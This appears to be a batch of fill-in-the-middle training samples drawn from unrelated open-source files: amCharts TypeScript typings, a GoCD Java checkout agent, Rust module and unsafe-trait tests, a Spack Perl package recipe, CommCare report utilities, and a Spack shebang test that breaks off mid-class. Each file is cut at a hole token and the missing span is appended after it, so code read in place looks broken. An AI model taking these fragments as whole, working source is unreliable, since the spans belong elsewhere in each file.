* @return Label element
*/
readonly label: this["_label"];
/**
* An element, related to this data item. (slice)
*
* @readonly
* @return Slice element
*/
readonly slice: this["_slice"];
/**
* Should dataItem (slice) be hidden in legend?
*
* @param value Visible in legend?
*/
/**
* @return Disabled in legend?
*/
hiddenInLegend: boolean;
}
/**
* ============================================================================
* REQUISITES
* ============================================================================
* @hidden
*/
/**
* Defines data fields for [[PercentSeries]].
*/
export interface IPercentSeriesDataFields extends ISeriesDataFields {
/**
* Name of the field in data that holds category.
*/
category?: string;
/**
* Name of the field in data that holds boolean flag if item should be
* hidden in legend.
*/
hiddenInLegend?: string;
}
/**
* Defines properties for [[PercentSeries]].
*/
export interface IPercentSeriesProperties extends ISeriesProperties {
/**
* A color set to be used for slices.
*
* For each new subsequent slice, the chart will assign the next color in
* this set.
*/
colors?: ColorSet;
/**
* Pattern set to apply to fills.
*
* @since 4.7.5
*/
patterns?: PatternSet;
/**
* Align labels into nice vertical columns?
*
* @default true
*/
alignLabels?: boolean;
/**
* If set to `true` the chart will not show slices with zero values.
*
* @default false
* @since 4.7.9
*/
ignoreZeroValues?: boolean;
}
/**
* Defines events for [[PercentSeries]].
*/
export interface IPercentSeriesEvents extends ISeriesEvents {
}
/**
* Defines adapters for [[PercentSeries]].
*
* @see {@link Adapter}
*/
export interface IPercentSeriesAdapters extends ISeriesAdapters, IPercentSeriesProperties {
}
/**
* ============================================================================
* MAIN CLASS
* ============================================================================
* @hidden
*/
/**
* Defines [[PercentSeries]] which is a base class for [[PieSeries]],
* [[FunnelSeries]], and [[PyramidSeries]].
*
* @see {@link IPercentSeriesEvents} for a list of available Events
* @see {@link IPercentSeriesAdapters} for a list of available Adapters
*/
export declare class PercentSeries extends Series {
/**
* Defines type of the slice elements for the series.
*/
_slice: Sprite;
/**
* Defines type of the tick elements for the series.
*/
_tick: Tick;
/**
* Defines type of the label elements for the series.
*/
_label: Label;
/**
* A reference to chart this series is for.
*
* @ignore Exclude from docs
*/
_chart: PercentChart;
/**
* Defines the type of data fields used for the series.
*/
_dataFields: IPercentSeriesDataFields;
/**
* Defines available properties.
*/
_properties: IPercentSeriesProperties;
/**
* Defines available adapters.
*/
_adapter: IPercentSeriesAdapters;
/**
* Defines available events.
*/
_events: IPercentSeriesEvents;
/**
* Defines the type of data item.
*/
_dataItem: PercentSeriesDataItem;
/**
* Container slice elements are put in.
*/
slicesContainer: Container;
/**
* Container tick elements are put in.
*/
ticksContainer: Container;
/**
* Container label elements are put in.
*/
labelsContainer: Container;
/**
* List of slice elements.
*/
protected _slices: ListTemplate<this["_slice"]>;
/**
* List of tick elements.
*/
protected _ticks: ListTemplate<this["_tick"]>;
/**
* List of label elements.
*/
protected _labels: ListTemplate<this["_label"]>;
/**
* Constructor
*/
constructor();
/**
* Creates a slice element.
*
* @return Slice
*/
protected createSlice(): this["_slice"];
/**
* Creates a tick element.
*
* @return Tick
*/
protected createTick(): this["_tick"];
/**
* Sreates label element.
*
* @return label
*/
protected createLabel(): this["_label"];
/**
* A list of slice elements for the series.
*
* Use its `template` to configure look and behavior of the slices. E.g.:
*
* ```TypeScript
* series.slices.template.stroke = am4core.color("#fff");
* series.slices.template.strokeWidth = 2;
* ```
* ```JavaScript
* series.slices.template.stroke = am4core.color("#fff");
* series.slices.template.strokeWidth = 2;
* ```
* ```JSON
* {
* // ...
* "series": [{
* // ...
* "slices": {
* "stroke": "#fff",
* "strokeWidth": 2
* }
* }]
* }
* ```
*
* @see {@link https://www.amcharts.com/docs/v4/concepts/list-templates/} for more information about list templates
* @return Slices
*/
readonly slices: ListTemplate<this["_slice"]>;
/**
* A list of tick elements for the series. Ticks connect slice to its label.
*
* Use its `template` to configure look and behavior of the ticks. E.g.:
*
* ```TypeScript
* series.ticks.template.strokeWidth = 2;
* ```
* ```JavaScript
* series.ticks.template.strokeWidth = 2;
* ```
* ```JSON
* {
* // ...
* "series": [{
* // ...
* "ticks": {
* "strokeWidth": 2
* }
* }]
* }
* ```
*
* @see {@link https://www.amcharts.com/docs/v4/concepts/list-templates/} for more information about list templates
* @return Ticks
*/
readonly ticks: ListTemplate<this["_tick"]>;
/**
* A list of slice label elements for the series.
*
* Use its `template` to configure look and behavior of the labels. E.g.:
*
* ```TypeScript
* series.labels.template.fill = am4core.color("#c00");
* series.labels.template.fontSize = 20;
* ```
* ```JavaScript
* series.labels.template.fill = am4core.color("#c00");
* series.labels.template.fontSize = 20;
* ```
* ```JSON
* {
* // ...
* "series": [{
* // ...
* "labels": {
* "stroke": "#c00",
* "fontSize": 20
* }
* }]
* }
* ```
*
* @see {@link https://www.amcharts.com/docs/v4/concepts/list-templates/} for more information about list templates
* @return Labels
*/
readonly labels: ListTemplate<this["_label"]>;
/**
* Returns a new/empty DataItem of the type appropriate for this object.
*
* @see {@link DataItem}
* @return Data Item
*/
protected createDataItem(): this["_dataItem"];
/**
* Creates and returns a new slice element.
*
* @param sliceType Type of the slice element
* @return Slice
*/
protected initSlice(slice: this["_slice"]): void;
protected initLabel(label: this["_label"]): void;
protected initTick(label: this["_tick"]): void;
/**
* Validates (processes) data items.
*
* @ignore Exclude from docs
*/
validateDataItems(): void;
/**
* Validates data item's element, effectively redrawing it.
*
* @ignore Exclude from docs
* @param dataItem Data item
*/
validateDataElement(dataItem: this["_dataItem"]): void;
/**
* Validates (processes) data.
*
* @ignore Exclude from docs
*/
validateData(): void;
/**
* Arranges slice labels according to position settings.
*
* @ignore Exclude from docs
* @param dataItems Data items
*/
protected arrangeLabels(dataItems: this["_dataItem"][]): void;
protected arrangeLabels2(dataItems: this["_dataItem"][]): void;
/**
* Returns the next label according to `index`.
*
* @param index Current index
* @param dataItems Data items
* @return Label element
*/
protected getNextLabel(index: number, dataItems: this["_dataItem"][]): this["_label"];
/**
* A color set to be used for slices.
*
* For each new subsequent slice, the chart will assign the next color in
* this set.
*
* @param value Color set
*/
/**
* @return Color set
*/
colors: ColorSet;
/**
* A [[PatternSet]] to use when creating patterned fills for slices.
*
* @since 4.7.5
* @param value Pattern set
*/
/**
* @return Pattern set
*/
patterns: PatternSet;
/**
* Binds related legend data item's visual settings to this series' visual
* settings.
*
* @ignore Exclude from docs
* @param marker Container
* @param dataItem Data item
*/
createLegendMarker(marker: Container, dataItem?: this["_dataItem"]): void;
/**
* Repositions bullets when slice's size changes.
*
* @ignore Exclude from docs
<|fim▁hole|> */
protected handleSliceScale(event: AMEvent<this["_slice"], ISpriteEvents>["propertychanged"]): void;
/**
* Repositions bullet and labels when slice moves.
*
* @ignore Exclude from docs
* @param event Event
*/
protected handleSliceMove(event: AMEvent<this["_slice"], ISpriteEvents>["propertychanged"]): void;
/**
* Copies all properties from another instance of [[PercentSeries]].
*
* @param source Source series
*/
copyFrom(source: this): void;
/**
* Align labels into nice vertical columns?
*
* This will ensure that labels never overlap with each other.
*
* Arranging labels into columns makes them more readble, and better user
* experience.
*
* If set to `false` labels will be positioned at `label.radius` distance,
* and may, in some cases, overlap.
*
* @default true
* @param value Align labels?
*/
/**
* @return Align labels?
*/
alignLabels: boolean;
/**
* @ignore
*/
protected setAlignLabels(value: boolean): void;
/**
* If set to `true` the chart will not show slices with zero values.
*
* @default false
* @since 4.7.9
* @param value Ignore zero values
*/
/**
* @return Ignore zero values
*/
ignoreZeroValues: boolean;
/**
* Updates corresponding legend data item with current values.
*
* @ignore Exclude from docs
* @param dataItem Data item
*/
updateLegendValue(dataItem?: this["_dataItem"]): void;
}<|fim▁end|> | * @param event Event
|
<|file_name|>PluggableSCMMaterialAgent.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2020 ThoughtWorks, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|> * limitations under the License.
*/
package com.thoughtworks.go.domain.materials.scm;
import com.thoughtworks.go.config.materials.PluggableSCMMaterial;
import com.thoughtworks.go.domain.MaterialRevision;
import com.thoughtworks.go.domain.config.Configuration;
import com.thoughtworks.go.domain.config.ConfigurationProperty;
import com.thoughtworks.go.domain.materials.MaterialAgent;
import com.thoughtworks.go.domain.materials.Modification;
import com.thoughtworks.go.domain.scm.SCM;
import com.thoughtworks.go.plugin.access.scm.SCMExtension;
import com.thoughtworks.go.plugin.access.scm.SCMProperty;
import com.thoughtworks.go.plugin.access.scm.SCMPropertyConfiguration;
import com.thoughtworks.go.plugin.access.scm.revision.SCMRevision;
import com.thoughtworks.go.plugin.api.response.Result;
import com.thoughtworks.go.util.command.ConsoleOutputStreamConsumer;
import org.apache.commons.lang3.StringUtils;
import java.io.File;
import static com.thoughtworks.go.util.command.TaggedStreamConsumer.PREP_ERR;
public class PluggableSCMMaterialAgent implements MaterialAgent {
private SCMExtension scmExtension;
private MaterialRevision revision;
private File workingDirectory;
private final ConsoleOutputStreamConsumer consumer;
public PluggableSCMMaterialAgent(SCMExtension scmExtension,
MaterialRevision revision,
File workingDirectory,
ConsoleOutputStreamConsumer consumer) {
this.scmExtension = scmExtension;
this.revision = revision;
this.workingDirectory = workingDirectory;
this.consumer = consumer;
}
@Override
public void prepare() {
try {
PluggableSCMMaterial material = (PluggableSCMMaterial) revision.getMaterial();
Modification latestModification = revision.getLatestModification();
SCMRevision scmRevision = new SCMRevision(latestModification.getRevision(), latestModification.getModifiedTime(), null, null, latestModification.getAdditionalDataMap(), null);
File destinationFolder = material.workingDirectory(workingDirectory);
Result result = scmExtension.checkout(material.getScmConfig().getPluginConfiguration().getId(), buildSCMPropertyConfigurations(material.getScmConfig()), destinationFolder.getAbsolutePath(), scmRevision);
handleCheckoutResult(material, result);
} catch (Exception e) {
consumer.taggedErrOutput(PREP_ERR, String.format("Material %s checkout failed: %s", revision.getMaterial().getDisplayName(), e.getMessage()));
throw e;
}
}
private void handleCheckoutResult(PluggableSCMMaterial material, Result result) {
if (result.isSuccessful()) {
if (StringUtils.isNotBlank(result.getMessagesForDisplay())) {
consumer.stdOutput(result.getMessagesForDisplay());
}
} else {
consumer.taggedErrOutput(PREP_ERR, String.format("Material %s checkout failed: %s", material.getDisplayName(), result.getMessagesForDisplay()));
throw new RuntimeException(String.format("Material %s checkout failed: %s", material.getDisplayName(), result.getMessagesForDisplay()));
}
}
private SCMPropertyConfiguration buildSCMPropertyConfigurations(SCM scmConfig) {
SCMPropertyConfiguration scmPropertyConfiguration = new SCMPropertyConfiguration();
populateConfiguration(scmConfig.getConfiguration(), scmPropertyConfiguration);
return scmPropertyConfiguration;
}
private void populateConfiguration(Configuration configuration,
com.thoughtworks.go.plugin.api.config.Configuration pluginConfiguration) {
for (ConfigurationProperty configurationProperty : configuration) {
pluginConfiguration.add(new SCMProperty(configurationProperty.getConfigurationKey().getName(), configurationProperty.getValue()));
}
}
}<|fim▁end|> | * See the License for the specific language governing permissions and |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>#![allow(dead_code)]
pub mod callback;
#[path = "../../src/utils/environment.rs"]
pub mod environment;
pub mod pool;
pub mod signus;
pub mod wallet;
pub mod ledger;
pub mod anoncreds;
pub mod types;
#[macro_use]
#[path = "../../src/utils/test.rs"]
pub mod test;<|fim▁hole|>pub mod agent;
#[path = "../../src/utils/sequence.rs"]
pub mod sequence;
#[path = "../../src/utils/json.rs"]
pub mod json;
#[macro_use]
#[path = "../../src/utils/cstring.rs"]
pub mod cstring;
#[path = "../../src/utils/inmem_wallet.rs"]
pub mod inmem_wallet;<|fim▁end|> |
#[path = "../../src/utils/timeout.rs"]
pub mod timeout; |
<|file_name|>trait-safety-ok.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Simple smoke test that unsafe traits can be compiled etc.
<|fim▁hole|> fn foo(&self) -> isize;
}
unsafe impl Foo for isize {
fn foo(&self) -> isize { *self }
}
fn take_foo<F:Foo>(f: &F) -> isize { f.foo() }
fn main() {
let x: isize = 22;
assert_eq!(22, take_foo(&x));
}<|fim▁end|> | unsafe trait Foo { |
<|file_name|>package.py<|end_file_name|><|fim▁begin|># Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
#
# Author: Milton Woods <[email protected]>
# Date: March 22, 2017
# Author: George Hartzell <[email protected]>
# Date: July 21, 2016
# Author: Justin Too <[email protected]>
# Date: September 6, 2015
#
import re
import os
from contextlib import contextmanager
from llnl.util.lang import match_predicate
from spack import *
class Perl(Package): # Perl doesn't use Autotools, it should subclass Package
"""Perl 5 is a highly capable, feature-rich programming language with over
27 years of development."""
homepage = "http://www.perl.org"
# URL must remain http:// so Spack can bootstrap curl
url = "http://www.cpan.org/src/5.0/perl-5.24.1.tar.gz"
executables = [r'^perl(-?\d+.*)?$']
# see http://www.cpan.org/src/README.html for
# explanation of version numbering scheme
# Maintenance releases (even numbers, recommended)
version('5.32.0', sha256='efeb1ce1f10824190ad1cadbcccf6fdb8a5d37007d0100d2d9ae5f2b5900c0b4')
# Development releases (odd numbers)
version('5.31.7', sha256='d05c4e72128f95ef6ffad42728ecbbd0d9437290bf0f88268b51af011f26b57d')
version('5.31.4', sha256='418a7e6fe6485cc713a86d1227ef112f0bb3f80322e3b715ffe42851d97804a5')
# Maintenance releases (even numbers, recommended)
version('5.30.3', sha256='32e04c8bb7b1aecb2742a7f7ac0eabac100f38247352a73ad7fa104e39e7406f', preferred=True)
version('5.30.2', sha256='66db7df8a91979eb576fac91743644da878244cf8ee152f02cd6f5cd7a731689')
version('5.30.1', sha256='bf3d25571ff1ee94186177c2cdef87867fd6a14aa5a84f0b1fb7bf798f42f964')
version('5.30.0', sha256='851213c754d98ccff042caa40ba7a796b2cee88c5325f121be5cbb61bbf975f2')
# End of life releases
version('5.28.0', sha256='7e929f64d4cb0e9d1159d4a59fc89394e27fa1f7004d0836ca0d514685406ea8')
version('5.26.2', sha256='572f9cea625d6062f8a63b5cee9d3ee840800a001d2bb201a41b9a177ab7f70d')
version('5.24.1', sha256='e6c185c9b09bdb3f1b13f678999050c639859a7ef39c8cad418448075f5918af')
version('5.22.4', sha256='ba9ef57c2b709f2dad9c5f6acf3111d9dfac309c484801e0152edbca89ed61fa')
version('5.22.3', sha256='1b351fb4df7e62ec3c8b2a9f516103595b2601291f659fef1bbe3917e8410083')
version('5.22.2', sha256='81ad196385aa168cb8bd785031850e808c583ed18a7901d33e02d4f70ada83c2')
version('5.22.1', sha256='2b475d0849d54c4250e9cba4241b7b7291cffb45dfd083b677ca7b5d38118f27')
version('5.22.0', sha256='0c690807f5426bbd1db038e833a917ff00b988bf03cbf2447fa9ffdb34a2ab3c')
version('5.20.3', sha256='3524e3a76b71650ab2f794fd68e45c366ec375786d2ad2dca767da424bbb9b4a')
version('5.18.4', sha256='01a4e11a9a34616396c4a77b3cef51f76a297e1a2c2c490ae6138bf0351eb29f')
version('5.16.3', sha256='69cf08dca0565cec2c5c6c2f24b87f986220462556376275e5431cc2204dedb6')
extendable = True
depends_on('gdbm')
depends_on('berkeley-db')
# there has been a long fixed issue with 5.22.0 with regard to the ccflags
# definition. It is well documented here:
# https://rt.perl.org/Public/Bug/Display.html?id=126468
patch('protect-quotes-in-ccflags.patch', when='@5.22.0')
# Fix build on Fedora 28
# https://bugzilla.redhat.com/show_bug.cgi?id=1536752
patch('https://src.fedoraproject.org/rpms/perl/raw/004cea3a67df42e92ffdf4e9ac36d47a3c6a05a4/f/perl-5.26.1-guard_old_libcrypt_fix.patch', level=1, sha256='0eac10ed90aeb0459ad8851f88081d439a4e41978e586ec743069e8b059370ac', when='@:5.26.2')
# Installing cpanm alongside the core makes it safe and simple for
# people/projects to install their own sets of perl modules. Not
# having it in core increases the "energy of activation" for doing
# things cleanly.
variant('cpanm', default=True,
description='Optionally install cpanm with the core packages.')
variant('shared', default=True,
description='Build a shared libperl.so library')
variant('threads', default=True,
description='Build perl with threads support')
resource(
name="cpanm",
url="http://search.cpan.org/CPAN/authors/id/M/MI/MIYAGAWA/App-cpanminus-1.7042.tar.gz",
sha256="9da50e155df72bce55cb69f51f1dbb4b62d23740fb99f6178bb27f22ebdf8a46",
destination="cpanm",
placement="cpanm"
)
phases = ['configure', 'build', 'install']
@classmethod
def determine_version(cls, exe):
perl = spack.util.executable.Executable(exe)
output = perl('--version', output=str, error=str)
if output:
match = re.search(r'perl.*\(v([0-9.]+)\)', output)
if match:
return match.group(1)
return None
@classmethod
def determine_variants(cls, exes, version):
for exe in exes:
perl = spack.util.executable.Executable(exe)
output = perl('-V', output=str, error=str)
variants = ''
if output:
match = re.search(r'-Duseshrplib', output)
if match:
variants += '+shared'
else:
variants += '~shared'
match = re.search(r'-Duse.?threads', output)
if match:
variants += '+threads'
else:
variants += '~threads'
path = os.path.dirname(exe)
if 'cpanm' in os.listdir(path):
variants += '+cpanm'
else:
variants += '~cpanm'
return variants
# On a lustre filesystem, patch may fail when files
# aren't writeable so make pp.c user writeable
# before patching. This should probably walk the
# source and make everything writeable in the future.
def do_stage(self, mirror_only=False):
# Do Spack's regular stage
super(Perl, self).do_stage(mirror_only)
# Add write permissions on file to be patched
filename = join_path(self.stage.source_path, 'pp.c')
perm = os.stat(filename).st_mode
os.chmod(filename, perm | 0o200)
def configure_args(self):
spec = self.spec
prefix = self.prefix
config_args = [
'-des',
'-Dprefix={0}'.format(prefix),
'-Dlocincpth=' + self.spec['gdbm'].prefix.include,
'-Dloclibpth=' + self.spec['gdbm'].prefix.lib,
]
# Extensions are installed into their private tree via
# `INSTALL_BASE`/`--install_base` (see [1]) which results in a
# "predictable" installation tree that sadly does not match the
# Perl core's @INC structure. This means that when activation
# merges the extension into the extendee[2], the directory tree
# containing the extensions is not on @INC and the extensions can
# not be found.
#
# This bit prepends @INC with the directory that is used when
# extensions are activated [3].
#
# [1] https://metacpan.org/pod/ExtUtils::MakeMaker#INSTALL_BASE
# [2] via the activate method in the PackageBase class
# [3] https://metacpan.org/pod/distribution/perl/INSTALL#APPLLIB_EXP
config_args.append('-Accflags=-DAPPLLIB_EXP=\\"' +
self.prefix.lib.perl5 + '\\"')
# Discussion of -fPIC for Intel at:
# https://github.com/spack/spack/pull/3081 and
# https://github.com/spack/spack/pull/4416
if spec.satisfies('%intel'):
config_args.append('-Accflags={0}'.format(
self.compiler.cc_pic_flag))
if '+shared' in spec:
config_args.append('-Duseshrplib')
if '+threads' in spec:
config_args.append('-Dusethreads')
if spec.satisfies('@5.31'):
config_args.append('-Dusedevel')
return config_args
def configure(self, spec, prefix):
configure = Executable('./Configure')
configure(*self.configure_args())
def build(self, spec, prefix):
make()
@run_after('build')
@on_package_attributes(run_tests=True)
def test(self):
make('test')
def install(self, spec, prefix):
make('install')
@run_after('install')
def install_cpanm(self):
spec = self.spec
if '+cpanm' in spec:
with working_dir(join_path('cpanm', 'cpanm')):
perl = spec['perl'].command
perl('Makefile.PL')
make()
make('install')
def _setup_dependent_env(self, env, dependent_spec, deptypes):
"""Set PATH and PERL5LIB to include the extension and
any other perl extensions it depends on,
assuming they were installed with INSTALL_BASE defined."""
perl_lib_dirs = []
for d in dependent_spec.traverse(deptype=deptypes):
if d.package.extends(self.spec):
perl_lib_dirs.append(d.prefix.lib.perl5)
if perl_lib_dirs:
perl_lib_path = ':'.join(perl_lib_dirs)
env.prepend_path('PERL5LIB', perl_lib_path)
def setup_dependent_build_environment(self, env, dependent_spec):
self._setup_dependent_env(env, dependent_spec,
deptypes=('build', 'run'))
def setup_dependent_run_environment(self, env, dependent_spec):
self._setup_dependent_env(env, dependent_spec, deptypes=('run',))
def setup_dependent_package(self, module, dependent_spec):
"""Called before perl modules' install() methods.
In most cases, extensions will only need to have one line:
perl('Makefile.PL','INSTALL_BASE=%s' % self.prefix)
"""
# If system perl is used through packages.yaml
# there cannot be extensions.
if dependent_spec.package.is_extension:
# perl extension builds can have a global perl
# executable function
module.perl = self.spec['perl'].command
# Add variables for library directory
module.perl_lib_dir = dependent_spec.prefix.lib.perl5
<|fim▁hole|>
@run_after('install')
def filter_config_dot_pm(self):
"""Run after install so that Config.pm records the compiler that Spack
built the package with. If this isn't done, $Config{cc} will
be set to Spack's cc wrapper script. These files are read-only, which
frustrates filter_file on some filesystems (NFSv4), so make them
temporarily writable.
"""
kwargs = {'ignore_absent': True, 'backup': False, 'string': False}
# Find the actual path to the installed Config.pm file.
perl = self.spec['perl'].command
config_dot_pm = perl('-MModule::Loaded', '-MConfig', '-e',
'print is_loaded(Config)', output=str)
with self.make_briefly_writable(config_dot_pm):
match = 'cc *=>.*'
substitute = "cc => '{cc}',".format(cc=self.compiler.cc)
filter_file(match, substitute, config_dot_pm, **kwargs)
# And the path Config_heavy.pl
d = os.path.dirname(config_dot_pm)
config_heavy = join_path(d, 'Config_heavy.pl')
with self.make_briefly_writable(config_heavy):
match = '^cc=.*'
substitute = "cc='{cc}'".format(cc=self.compiler.cc)
filter_file(match, substitute, config_heavy, **kwargs)
match = '^ld=.*'
substitute = "ld='{ld}'".format(ld=self.compiler.cc)
filter_file(match, substitute, config_heavy, **kwargs)
match = "^ccflags='"
substitute = "ccflags='%s " % ' '\
.join(self.spec.compiler_flags['cflags'])
filter_file(match, substitute, config_heavy, **kwargs)
@contextmanager
def make_briefly_writable(self, path):
"""Temporarily make a file writable, then reset"""
perm = os.stat(path).st_mode
os.chmod(path, perm | 0o200)
yield
os.chmod(path, perm)
# ========================================================================
# Handle specifics of activating and deactivating perl modules.
# ========================================================================
def perl_ignore(self, ext_pkg, args):
"""Add some ignore files to activate/deactivate args."""
ignore_arg = args.get('ignore', lambda f: False)
# Many perl packages describe themselves in a perllocal.pod file,
# so the files conflict when multiple packages are activated.
# We could merge the perllocal.pod files in activated packages,
# but this is unnecessary for correct operation of perl.
# For simplicity, we simply ignore all perllocal.pod files:
patterns = [r'perllocal\.pod$']
return match_predicate(ignore_arg, patterns)
def activate(self, ext_pkg, view, **args):
ignore = self.perl_ignore(ext_pkg, args)
args.update(ignore=ignore)
super(Perl, self).activate(ext_pkg, view, **args)
extensions_layout = view.extensions_layout
exts = extensions_layout.extension_map(self.spec)
exts[ext_pkg.name] = ext_pkg.spec
def deactivate(self, ext_pkg, view, **args):
ignore = self.perl_ignore(ext_pkg, args)
args.update(ignore=ignore)
super(Perl, self).deactivate(ext_pkg, view, **args)
extensions_layout = view.extensions_layout
exts = extensions_layout.extension_map(self.spec)
# Make deactivate idempotent
if ext_pkg.name in exts:
del exts[ext_pkg.name]
@property
def command(self):
"""Returns the Perl command, which may vary depending on the version
of Perl. In general, Perl comes with a ``perl`` command. However,
development releases have a ``perlX.Y.Z`` command.
Returns:
Executable: the Perl command
"""
for ver in ('', self.spec.version):
path = os.path.join(self.prefix.bin, '{0}{1}'.format(
self.spec.name, ver))
if os.path.exists(path):
return Executable(path)
else:
msg = 'Unable to locate {0} command in {1}'
raise RuntimeError(msg.format(self.spec.name, self.prefix.bin))<|fim▁end|> | # Make the site packages directory for extensions,
# if it does not exist already.
mkdirp(module.perl_lib_dir) |
<|file_name|>util.py<|end_file_name|><|fim▁begin|>import collections
import hashlib
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from corehq.util.soft_assert import soft_assert
from corehq import privileges, toggles
from corehq.apps.hqwebapp.templatetags.hq_shared_tags import toggle_enabled
from corehq.apps.userreports.const import (
REPORT_BUILDER_EVENTS_KEY,
UCR_ES_BACKEND
)
from django_prbac.utils import has_privilege
from corehq.apps.userreports.dbaccessors import get_all_es_data_sources
from corehq.apps.userreports.exceptions import BadBuilderConfigError
def localize(value, lang):
"""
Localize the given value.
This function is intended to be used within UCR to localize user supplied
translations.
:param value: A dict-like object or string
:param lang: A language code.
"""
if isinstance(value, collections.Mapping) and len(value):
return (
value.get(lang, None) or
value.get(default_language(), None) or
value[sorted(value.keys())[0]]
)
return value
def default_language():
return "en"
def has_report_builder_add_on_privilege(request):
return any(
has_privilege(request, p) for p in privileges.REPORT_BUILDER_ADD_ON_PRIVS
)
def has_report_builder_access(request):
builder_enabled = toggle_enabled(request, toggles.REPORT_BUILDER)
legacy_builder_priv = has_privilege(request, privileges.REPORT_BUILDER)
beta_group_enabled = toggle_enabled(request, toggles.REPORT_BUILDER_BETA_GROUP)
has_add_on_priv = has_report_builder_add_on_privilege(request)
return (builder_enabled and legacy_builder_priv) or beta_group_enabled or has_add_on_priv
def add_event(request, event):
events = request.session.get(REPORT_BUILDER_EVENTS_KEY, [])
request.session[REPORT_BUILDER_EVENTS_KEY] = events + [event]
def has_report_builder_trial(request):
return has_privilege(request, privileges.REPORT_BUILDER_TRIAL)
def can_edit_report(request, report):
ucr_toggle = toggle_enabled(request, toggles.USER_CONFIGURABLE_REPORTS)
report_builder_toggle = toggle_enabled(request, toggles.REPORT_BUILDER)
report_builder_beta_toggle = toggle_enabled(request, toggles.REPORT_BUILDER_BETA_GROUP)
add_on_priv = has_report_builder_add_on_privilege(request)
created_by_builder = report.spec.report_meta.created_by_builder
if created_by_builder:
return report_builder_toggle or report_builder_beta_toggle or add_on_priv
else:
return ucr_toggle
def allowed_report_builder_reports(request):
"""
Return the number of report builder reports allowed
"""
builder_enabled = toggle_enabled(request, toggles.REPORT_BUILDER)
legacy_builder_priv = has_privilege(request, privileges.REPORT_BUILDER)
beta_group_enabled = toggle_enabled(request, toggles.REPORT_BUILDER_BETA_GROUP)
if toggle_enabled(request, toggles.UNLIMITED_REPORT_BUILDER_REPORTS):
return float("inf")
if has_privilege(request, privileges.REPORT_BUILDER_30):
return 30
if has_privilege(request, privileges.REPORT_BUILDER_15):
return 15
if (
has_privilege(request, privileges.REPORT_BUILDER_TRIAL) or
has_privilege(request, privileges.REPORT_BUILDER_5) or
beta_group_enabled or
(builder_enabled and legacy_builder_priv)
):
return 5
def number_of_report_builder_reports(domain):
from corehq.apps.userreports.models import ReportConfiguration
existing_reports = ReportConfiguration.by_domain(domain)
builder_reports = filter(
lambda report: report.report_meta.created_by_builder, existing_reports
)
return len(builder_reports)
def get_indicator_adapter(config, raise_errors=False):
from corehq.apps.userreports.sql.adapter import IndicatorSqlAdapter, ErrorRaisingIndicatorSqlAdapter
from corehq.apps.userreports.es.adapter import IndicatorESAdapter
if get_backend_id(config) == UCR_ES_BACKEND:
return IndicatorESAdapter(config)
else:
if raise_errors:
return ErrorRaisingIndicatorSqlAdapter(config)
return IndicatorSqlAdapter(config)
def get_table_name(domain, table_id):
def _hash(domain, table_id):
return hashlib.sha1('{}_{}'.format(hashlib.sha1(domain).hexdigest(), table_id)).hexdigest()[:8]
return truncate_value(
'config_report_{}_{}_{}'.format(domain, table_id, _hash(domain, table_id)),
from_left=False
)
def is_ucr_table(table_name):
return table_name.startswith('config_report_')
<|fim▁hole|>
def truncate_value(value, max_length=63, from_left=True):
"""
Truncate a value (typically a column name) to a certain number of characters,
using a hash to ensure uniqueness.
"""
hash_length = 8
truncated_length = max_length - hash_length - 1
if from_left:
truncated_value = value[-truncated_length:]
else:
truncated_value = value[:truncated_length]
if len(value) > max_length:
short_hash = hashlib.sha1(value).hexdigest()[:hash_length]
return '{}_{}'.format(truncated_value, short_hash)
return value
def get_ucr_es_indices():
sources = get_all_es_data_sources()
return [get_table_name(s.domain, s.table_id) for s in sources]
def get_backend_id(config):
if settings.OVERRIDE_UCR_BACKEND:
return settings.OVERRIDE_UCR_BACKEND
return config.backend_id<|fim▁end|> | |
<|file_name|>sbang.py<|end_file_name|><|fim▁begin|>##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""\
Test that Spack's shebang filtering works correctly.
"""
import os
import stat
import pytest
import tempfile
import shutil
import filecmp
from llnl.util.filesystem import mkdirp
import spack
from spack.hooks.sbang import shebang_too_long, filter_shebangs_in_directory
from spack.util.executable import which
short_line = "#!/this/is/short/bin/bash\n"
long_line = "#!/this/" + ('x' * 200) + "/is/long\n"
lua_line = "#!/this/" + ('x' * 200) + "/is/lua\n"<|fim▁hole|>lua_in_text = ("line\n") * 100 + "lua\n" + ("line\n" * 100)
lua_line_patched = "--!/this/" + ('x' * 200) + "/is/lua\n"
node_line = "#!/this/" + ('x' * 200) + "/is/node\n"
node_in_text = ("line\n") * 100 + "lua\n" + ("line\n" * 100)
node_line_patched = "//!/this/" + ('x' * 200) + "/is/node\n"
sbang_line = '#!/bin/bash %s/bin/sbang\n' % spack.spack_root
last_line = "last!\n"
class ScriptDirectory(object):
"""Directory full of test scripts to run sbang instrumentation on."""
